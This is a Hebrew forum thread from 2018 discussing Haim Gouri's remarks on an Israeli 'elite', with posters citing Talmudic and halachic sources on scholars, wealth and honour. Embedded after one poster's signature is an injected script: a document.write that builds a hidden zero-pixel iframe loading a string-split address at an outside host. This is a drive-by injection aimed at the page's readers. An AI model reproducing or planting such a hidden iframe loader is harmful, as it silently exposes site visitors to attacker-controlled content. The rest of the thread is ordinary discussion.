| נשלח ב-7/2/2018 16:50 |
|
| |
אליטה
|
|
|
|
| נשלח ב-7/2/2018 16:52 |
|
| |
"אליטה זו קבוצה שתורמת לעוצמה לאומית ואוניברסלית, וחיה במועקה מוסרית מתמדת כלפי החברה שבה היא חיה ויוצרת. אין עַם בלי אליטה. לא משנה אם מדובר בחילונים, דתיים, ספרדים או אשכנזים. האליטות הן כל דבר שמחזק את העוצמה הלאומית, אבל בצורה אוניברסלית ולא לאומנית, כאלו שלא יכולים לעבור על עוולות בשתיקה. איך המושג הנכון והחשוב הזה הפך להיות משהו דוחה? זה חלק מחולי איום שקורה במדינה הזו. האליטה זו התקווה היחידה בתוך הסבל של החיים הפוליטיים. אבא שלי, ישראל גורי, היה חבר כנסת חמש פעמים, ולא היה מעלה על דעתו את מה שקורה היום. בלעדי האליטה היינו נמחקים מהעולם מזמן".
|
|
|
|
| נשלח ב-8/2/2018 07:55 |
|
| |
שרפ
תודה על המקורות.
בגלובס יש כנראה הקלטה.
מצמרר: מילותיו האחרונות של חתן פרס ישראל חיים גורי ז"ל מתוך נאומו הפומבי האחרון של המשורר והסופר, חתן פרס ישראל, חיים גורי שהלך לעולמו. גורי מציע לנסח מחדש את המונח "אליטה ישראלית", שהפכה למאוסה בעיני פלח נרחב באוכלוסייה. צפו בקטע מהנאום (וגם הרבה מאד פירסומות שלא כולן נחסמות)...
|
|
|
|
| נשלח ב-8/2/2018 08:03 |
|
| |
אם הבנתי נכון, יש כאן הצעה לדיון בקבוצות עילית, הלא הן ה"אליטה". בדרך כלל יש לנו רתיעה מתופעות כאלו, המנוגדות לדמוקרטיה ולשויון. מה פתאום שתהיה איזו קבוצה שרואה בעצמה מעלות וייחוס?
במיוחד אם אני לא נכלל בה? (האם זו לא התגובה הטבעית שלי, שלנו)?
אבל יתכן שיהיו קבוצות אלו שבאמת יתרמו באופן מיוחד בזכות כישורים ורצון טוב.
אני משער שזה הנושא?
אז ארשה לעצמי לכתוב דבר טריוויאלי כמעט.
קודם כל צריך להבהיר למה אנו מתכוונים בקבוצת אליטה. אולי כדאי גם להביא דוגמאות שמהן ניתן יהיה לראות מה התרומה ומה הנזק, אם יש.
שנית, איך נוצרת כזו קבוצה?
שלישית, והכי חשוב אולי: האם ואיך יש לה מנגנון ביקורת פנימי או חיצוני?
לורד אקטון הזהיר כי "עוצמה משחיתה". אם זה נכון, ודומה שהכל מודים שעוצמה יוצרת פיתויים לבעלי הכוח, אזי כל אליטה עומדת בפני הפיתוי להשתמש לרעה בכוחה.
יתכן שבאמת כדאי שיהיו אליטות למרות הסיכון. יתכן שאז צריך לשלב את האליטה עם מנגנוני פיקוח. יתכן שגם זה לא יספיק לחלוטין ויהיה תמיד מצב דינמי: האליטה תתרום, האליטה תהיה מסוכנת, אם זו דמוקרטיה האליטה תותקף ואולי תבוטל, אבל אז יתעורר בה הצורך ויקימו אותה או שכמותה מחדש, וחוזר חלילה.
כתבתי רעיונות באופן שטחי, אבל דומה שיש בהם ממש. עכשו צריך לאסוף דוגמאות ולבדוק.
הנה כמה הצעות:
א. האם חכמינו היוו אליטה? איך הם הגנו על עצמם ועל הציבור.
הצעה מתוך התלמוד:
תלמוד בבלי מסכת ברכות דף יז עמוד א מרגלא בפומייהו דרבנן דיבנה: אני בריה וחברי בריה, אני מלאכתי בעיר והוא מלאכתו בשדה, אני משכים למלאכתי והוא משכים למלאכתו, כשם שהוא אינו מתגדר במלאכתי כך אני איני מתגדר במלאכתו, ושמא תאמר: אני מרבה והוא ממעיט - שנינו: אחד המרבה ואחד הממעיט ובלבד שיכוין לבו לשמים.
מצד שני מצאנו שחכמים העניקו לעצמם ולשכבה שלהם זכויות:
סדר העליה לתורה קובע במקום מסויים עדיפות לבני תלמידי חכמים והממונים על הציבור (לא מצאתי כרגע בפרוייקט השות).
ב. אדמורים וראשי ישיבות
ויש כמובן עוד קבוצות אליטות בתולדות עמנו.
___נוספה שאלת רפלקציה לגבי היחס האישי שלי לאליטות שאיני נכלל בהן______________
שומר פיו ולשונו - שומר מצרות נפשו
< type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");>
תוקן על ידי מיימוני ב- 08/02/2018 08:04:35
 |
|
|
|
|
| נשלח ב-8/2/2018 09:00 |
|
| |
מיימוני למען הסדר הטוב, כדאי להביא גם את פירוש רש"י בברכות
מרגלא בפומיה - דבר זה רגיל בפיו. אני - העוסק בתורה בריה אני, וכן חברי עם הארץ בריה הוא. אני מלאכתי בעיר - כלומר: נוחה מלאכתי ממלאכתו. מתגדר - מתגדל לתפוש אומנותי. ושמא תאמר - הדין עמו שאינו מתגדר במלאכתי, שאילו היה תופס אומנותי לא היה לו לב פתוח להרבות בתורה כמותי, והיה ממעיט ואין לו שכר. שנינו - שיש לו שכר לממעיט כמו למרבה. ובלבד שיכוין לבו לשמים - ואצל קרבנות הוא, במנחות בסופה.
|
|
|
|
| נשלח ב-8/2/2018 14:53 |
|
| |
מיימוני.
"לא מצאתי כרגע".
ראה גיטין, דף ס, ראש עמ' א.
תוקן על ידי נישטאיך ב- 08/02/2018 14:56:28
|
|
|
|
| נשלח ב-8/2/2018 15:28 |
|
| |
בד"כ אליטה מגדירה את עצמה באמצעות אליטה שקדמה לה.
האליטה של ת"ח הוגדרה ביחס לאליטה של הכהנים. ובני דוד כהנים היו, אמר רבא: מה כהן נוטל בראש, אף תלמיד חכם נוטל בראש.
חיים גורי התכוון לאליטה של הפלמ"ח, שהגדירה את עצמה ביחס לאליטה של החלוצים. באופן דומה, אהרון דוידי, ממקימי ומפקדי חטיבת הצנחנים, הגדיר את הצנחנים בעזרת שירו של ביאליק "יהי חלקי עמכם".
|
|
|
|
| נשלח ב-9/2/2018 04:06 |
|
| |
בעל <אני - העוסק בתורה בריה אני, וכן חברי עם הארץ בריה הוא> ברייתא שהובאה בתלמוד, פסחים, מט, ב: "תנו רבנן: לעולם ימכור אדם כל מה שיש לו וישא בת תלמיד חכם. לא מצא בת תלמיד חכם - ישא בת גדולי הדור. לא מצא בת גדולי הדור - ישא בת ראשי כנסיות, לא מצא בת ראשי כנסיות - ישא בת גבאי צדקה. לא מצא בת גבאי צדקה - ישא בת מלמדי תינוקות. ולא ישא בת עמי הארץ, מפני שהן שקץ, ונשותיהן שרץ, ועל בנותיהן הוא אומר (דברים כז, כא) ארור שכב עם בהמה". ואולי י"ל תרי עמי הארץ הוו. _______________________ מיימוני <סדר העליה לתורה קובע במקום מסויים עדיפות לבני תלמידי חכמים והממונים על הציבור> מתקופה מסויימת עמדו הע"ה הנכבד, והעשיר בראש האליטא, לפני הת"ח, וכך נוהגים בימנו: : ראה רמ"א, שולחן ערוך אורח חיים, רפב, ג: "ואין איסור לקרות ע"ה נכבד, עשיר, וגדול הדור לפני ת"ח, כי אין זה בזיון לת"ח רק כבוד לתורה שמתכבדת באנשים גדולים". גם ראה "ביאור הלכה", סי' קלה, בד"ה ואם הוא אדם חשוב וכו: "... וראיתי בתשב"ץ קטן סימן קפ"ט שכתב בהיפך מזה וז"ל בירושלמי פרק בא לו כאן את אמרת הלוך אחר תורה וכאן את אמרת מוליכין התורה אצלו אלא ע"י בני אדם גדולים התורה מתעלה מכאן ראיה שאין איסור לקרוא לתורה עשיר מכובד לפני ת"ח מפני שע"י אנשים גדולים התורה מתעלה עכ"ל הרי משמע מדבריו דאנשים גדולים המוזכרים בירושלמי הוא לאו דוקא ת"ח ולא העתקתי כדעתו במ"ב מפני שדבריו קשין שהרי מסוף דברי הירושלמי מבואר בהיפוך מזה וכנ"ל אכן אחרי בינותי ראיתי שהרמ"א בסימן רפ"ב העתיק דין דתשב"ץ להלכה [ומה שנרשם שם אור זרוע טעות הוא שלא נמצא כלל באור זרוע רק בתשב"ץ הנ"ל שזהו לשונו ממש וכנ"ל] ואולי שהרמ"א מחלק בין לקרותו לתורה ובין להביא ס"ת אצלו דלזה בעינן חשוב ביותר ואע"ג שהתשב"ץ בעצמו הוציא דינו רק מהירושלמי הנ"ל הרמ"א החליט את דינו רק מסברא בעלמא וצ"ע". יש לציין לשינוי שבין דברי התשב"ץ לדברי הרמ"א, שלדבריו הנכבד הוא הע"ה, ואילו בדברי התשב"ץ שאינו מביא את הע"ה, הנכבד הוא העשיר. הערוך השלחן העיר )סי' רפב, י( על דברי הרמ"א: "... מובן שזהו כשההכרח מביא לידי כך". מהי כוונתו?
 |
|
|
|
|
| נשלח ב-9/2/2018 12:36 |
|
| |
למדנו מהגמרא כי גדולי הדור אינם תלמידי חכמים
|
|
|